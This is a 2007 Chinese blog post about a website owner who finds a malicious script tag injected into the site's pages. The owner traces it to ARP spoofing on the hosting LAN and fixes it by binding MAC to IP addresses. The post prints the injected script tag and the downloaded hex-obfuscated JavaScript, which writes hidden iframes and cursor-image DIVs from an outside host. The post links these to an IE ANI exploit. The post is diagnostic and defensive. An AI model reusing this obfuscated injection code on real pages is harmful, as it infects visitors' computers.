网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
ie和firefox中img对象区别的困惑
Dec 27 Javascript
Javascript+XMLHttpRequest+asp.net无刷新读取数据库数据
Aug 09 Javascript
jQuery 入门级学习笔记及源码
Jan 22 Javascript
StringTemplate遇见jQuery冲突的解决方法
Sep 22 Javascript
使用EVAL处理jqchart jquery 折线图返回数据无效的解决办法
Nov 26 Javascript
浅析上传头像示例及其注意事项
Dec 14 Javascript
Vue 2.0的数据依赖实现原理代码简析
Jul 10 Javascript
关于Angularjs中跨域设置白名单问题
Apr 17 Javascript
js与jQuery实现获取table中的数据并拼成json字符串操作示例
Jul 12 jQuery
记React connect的几种写法(小结)
Sep 18 Javascript
jQuery实现的卷帘门滑入滑出效果【案例】
Feb 18 jQuery
layui使用templet格式化表格数据的方法
Sep 16 Javascript
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
PHP图片处理之使用imagecopyresampled函数实现图片缩放例子
2014/11/19 PHP
PHP CURL 内存泄露问题解决方法
2015/02/12 PHP
JQuery 1.4 中的Ajax问题
2010/01/23 Javascript
让你的博文自动带上缩址的实现代码,方便发到微博客上
2010/12/28 Javascript
jquery.hotkeys监听键盘按下事件keydown插件
2014/05/11 Javascript
自己动手写的javascript前端等待控件
2015/10/30 Javascript
浅谈jquery的map()和each()方法
2016/06/12 Javascript
Node.js环境下编写爬虫爬取维基百科内容的实例分享
2016/06/12 Javascript
jQuery ztree实现动态树形多选菜单
2016/08/12 Javascript
JQuery统计input和textarea文字输入数量(代码分享)
2016/12/29 Javascript
在 Angular2 中实现自定义校验指令(确认密码)的方法
2017/01/23 Javascript
Angular使用$http.jsonp发送跨站请求的方法
2017/03/16 Javascript
详解react服务端渲染(同构)的方法
2017/09/21 Javascript
Vue实现内部组件轮播切换效果的示例代码
2018/04/07 Javascript
使用webpack搭建react开发环境的方法
2018/05/15 Javascript
解决vue同一slot在组件中渲染多次的问题
2018/09/06 Javascript
在Python中操作列表之list.extend()方法的使用
2015/05/20 Python
Python 常用string函数详解
2016/05/30 Python
Python类的动态修改的实例方法
2017/03/24 Python
import的本质解析
2017/10/30 Python
python+splinter自动刷新抢票功能
2018/09/25 Python
python利用selenium进行浏览器爬虫
2019/04/25 Python
pyqt5 QlistView列表显示的实现示例
2020/03/24 Python
Django框架配置mysql数据库实现过程
2020/04/22 Python
Pytorch通过保存为ONNX模型转TensorRT5的实现
2020/05/25 Python
pytorch SENet实现案例
2020/06/24 Python
python如何运行js语句
2020/09/09 Python
Python使用内置函数setattr设置对象的属性值
2020/10/16 Python
HTML5表格_动力节点Java学院整理
2017/07/11 HTML / CSS
eVitamins日本:在线购买折扣维生素、补品和草药
2019/04/04 全球购物
自荐信要包含哪些内容
2013/11/06 职场文书
机关单位动员会主持词
2014/03/20 职场文书
旅行社优秀创业计划书
2014/08/16 职场文书
学生违纪检讨书200字
2014/10/21 职场文书
驳回起诉裁定书
2015/05/19 职场文书
盘点2020年适合农村地区创业的项目
2019/10/16 职场文书